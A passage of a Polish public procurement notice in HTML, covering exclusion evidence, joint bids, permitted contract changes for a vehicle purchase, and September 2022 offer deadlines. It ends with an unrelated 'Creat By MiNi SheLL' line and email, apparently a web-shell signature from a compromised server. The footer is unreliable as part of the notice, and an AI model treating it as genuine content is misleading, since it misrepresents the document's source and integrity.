wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych:<br/>1) W zakresie potwierdzenia braku podstaw do wykluczenia:<br/>􀀀 oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym na podstawie art. 125 ust. 1 Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp.<br/>e) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>którego wzór stanowi Załącznik nr 5 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku:<br/>– Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu<br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>– Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>Każdy spośród wykonawców ubiegających się o udzielenie zamówienia składa oświadczenie potwierdzające brak podstaw<br/>wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy:<br/>a) Na skutek okoliczności wskazanych w art. 15r ustawy z dnia 2 marca 2020 r., o szczególnych rozwiązaniach związanych<br/>z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji<br/>kryzysowych (Dz. U. z 2021, poz. 2095 z późn. zm.), na warunkach określonych w ustępie 4 tegoż artykułu.<br/>b) zmiany parametrów technicznych lub podzespołów zamawianego pojazdu, jeżeli będą one korzystniejsze dla<br/>Zamawiającego. Zamawiający dopuszcza również ewentualną zmianę wynagrodzenia w tym względzie.<br/>c) zmiany terminu realizacji zamówienia z przyczyn zależnych od Zamawiającego lub usprawiedliwionych przyczyn,<br/>niezależnych od Wykonawcy. W takim przypadku Wykonawca zobowiązany jest przedstawić Zamawiającemu niezbędne<br/>dowody, potwierdzające fakt, iż nie dotrzymanie terminu realizacji zamówienia nie nastąpiło z jego winy. Dotyczy to w<br/>szczególności przestojów w produkcji części lub podzespołów niezbędnych do zamontowania w pojeździe lub innych<br/>niezależnych od Wykonawcy sytuacji.<br/>d) zmiany terminu realizacji zamówienia na skutek wystąpienia niemożliwych do przewidzenia na etapie postępowania<br/>czynników zewnętrznych niezależnych od stron, takich jak klęski żywiołowe (np. powodzie, podtopienia, pożary, trąby<br/>powietrzne, wichury, itp.), działania wojenne, akty terroryzmu, stany wyjątkowe, wojenne lub innych okoliczności noszących<br/>znamiona siły wyższej, powodujących niemożność terminowej realizacji zamówienia.<br/>e) zmiany terminu realizacji na skutek przewlekłości postępowań administracyjnych, obowiązków nałożonych przez organy<br/>władcze, zmian przepisów prawa, strajków, blokad, protestów itp. będących przyczyną niemożność zakończenia realizacji<br/>zamówienia w ustalonym terminie.<br/>f) zmiany terminu realizacji lub wynagrodzenia Wykonawcy, na skutek błędów w dokumentach zamówienia, lub innych<br/>dokumentach związanych z realizacją zamówienia, które nie zostały wykryte przez żadną ze stron, pomimo zachowania<br/>należytej staranności.<br/>g) innych postanowień umowy w przypadkach:<br/>• zmian wynikających z przekształceń własnościowych,<br/>• zmian organizacyjno-technicznych,<br/>• zmiany adresów,<br/>• obniżenia wynagrodzenia Wykonawcy,<br/>• zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, (danych teleadresowych Wykonawcy;<br/>Zamawiającego) - zmiana ta następuje poprzez dokonane w formie pisemnej zgłoszenie tego faktu drugiej stronie i nie<br/>wymaga zawarcia aneksu do umowy,<br/>• przekształcenia Wykonawcy w związku z sukcesją generalną, przekształceniami, dziedziczeniem spółek handlowych<br/>zgodnie z KSH, a także sukcesją z mocy prawa, zgodnie z obowiązującymi przepisami (następstwa prawne) winno nastąpić<br/>w formie aneksu do umowy.<br/>h) zmiany wynagrodzenia Wykonawcy w związku ze zmianą: stawki podatku od towarów i usług,<br/>• wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października<br/>2002 r. o minimalnym wynagrodzeniu za pracę,<br/>• zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne.<br/>3. Wszystkie zmiany dokonane będą w oparciu o zawarty pomiędzy stronami aneks, określający zakres zmiany oraz<br/>podstawę jej wprowadzenia.<br/><br/>Szczegółowy zakres zmian umowy określa załącznik nr 4.2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com